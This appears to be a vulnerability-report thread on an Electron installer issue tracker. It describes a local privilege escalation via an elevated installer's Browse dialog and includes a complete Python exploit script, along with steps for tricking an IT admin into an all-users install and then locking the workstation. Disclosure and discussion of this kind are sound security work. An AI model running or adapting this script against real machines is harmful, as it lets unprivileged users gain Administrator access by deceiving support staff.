Installer is capable of spawning elevated command prompt which leads to LPE to `Administrator`

[ViktarStarastsenka]

• Electron-Builder Version: 24.13.3

• Node Version:

• Electron Version: 31.0.2
• Electron Type (current, beta, nightly):

• Target:

Summary An Electron application runs as Administrator during installation, allowing the current user to escalate privileges to Administrator by clicking on Browse, right clicking Desktop while holding SHIFT, and choosing Open command window here.

Remediation:

Do not allow users to break out of the installer window and run programs in the same elevated context during installation.

If an application needs to be run during installation, impersonate the user token with a Medium or lower integrity and do not run with elevated privileges.

[mmaietta]

Can you share a video of what you're mentioning? I'm not sure I'm following

impersonate the user token with a Medium or lower integrity and do not run with elevated privileges.

I also am not sure I understand what you mean by user token either.

It's proper update logic for the application to attempt to be installed as current user, before attempting to use elevate.exe (with UAC prompt) to elevate the installer to admin rights for installation

[ViktarStarastsenka]

@mmaietta ,

Steps To Reproduce (Local Privilege Escalation to Administrator)

Non-Admin User - The Attacker:

1) Run the following exploit (Python3 script) in the background. Make sure the pyautogui, pywin32, and psutil modules are installed using pip install before running the exploit.

import pyautogui
import win32gui
import os
import psutil

input("This exploit will run when you press ENTER (this window will be hidden).\nRequest an admin to download and install the application after starting the exploit..")
hwnd = win32gui.GetForegroundWindow()
win32gui.ShowWindow(hwnd, 0)

def check_for_consent():
for proc in psutil.process_iter(['name']):
if proc.info['name'] == 'consent.exe':
return True
return False

isRunning = False
while not isRunning:
windows = pyautogui.getAllTitles()
if "Application Setup " in windows:
print("Application Setup Window Detected..")
isRunning = True

os.system("echo blocker > %LOCALAPPDATA%\Programs\App_name")

isUACSpawned = False
while not isUACSpawned:
isUACSpawned = check_for_consent()
print("UAC Opened..")
while isUACSpawned:
isUACSpawned = check_for_consent()
print("UAC Completed..")

print("Locking..")
cmd='rundll32.exe user32.dll, LockWorkStation'
os.system(cmd)

2) Request an admin user to help install the application for Windows for the non-admin user. In a real world scenario, this can be submitted through a support ticket to IT.

Admin User - The Victim:

3) Attempt to install the application for the current user, but observe that the Install button is greyed out (this is due to the exploit). Therefore, choose to install for all users instead (requires admin credentials).

5) Observe that the user's workstation is now locked due to the attacker's running exploit. At this point, return the machine back to the non-admin user.

Non-Admin User - The Attacker: 6) Unlock the account to re-access the machine.

7) Click on Browse, right click Desktop while holding SHIFT, and choose Open command window here. An Administrator command prompt has now been granted to the attacker. {F3540322}

8) This confirms the local privilege escalation to Administrator scenario.

[mmaietta]

Is this possible with any other app that isn't electron-based and also not built with electron-builder? Looks like this script could be used for any app installation since this is being executed os.system("echo blocker > %LOCALAPPDATA%\Programs\App_name")

This seems like a vulnerability in NSIS installers as the electron app doesn't have any context as to what is occurring during installation. It executes an elevate.exe for admin-installs and does not execute a consent.exe - not sure where consent.exe is coming from albeit my knowledge of Windows OS & NSIS scripting is pretty minimal.

[ivanggq]

Just a curious bystander, that got interested in this issue. I have a few questions:

1. observe that the Install button is greyed out (this is due to the exploit)
   • How is the Python script disabling the Install button? By os.system("echo blocker > %LOCALAPPDATA%\Programs\App_name")? This is writing a file %LOCALAPPDATA%\Programs\App_name with content blocker, right? Is this disabing the Install button? If so, how exactly?
2. The exploit is essentially locking the session while the admin has an elevated app running. This seems no different then an admin coming to the PC, opening an elevated CMD and locking the session, leaving the admin CMD behind. Of course the elevated CMD can be used if it is not closed... or am I missing something.
3. But even if an admin does this mistake (leaves an elevated app/CMD), how is he exactly a victim? The non-admin user just gained elevated access to his machine and nothing else. Maybe causing a headache for the IT admin (breaking something and the IT admin may need to fix it later), but how is the admin the victim?

[redisec]

@ivanggq, i agree with points 2 and 3 in your comments. There are probably other and easier ways to trick admin to leave elevated cmd open.
I think the main problem is that there is a way to alter the execution flow of the electron-based application by using this script. I am also not an expert in Windows app flows. Would be great if someone could confirm if this is a Windows issue applicable to other types of installers or the electron specific one (like @mmaietta mentioned earlier). Any windows experts here?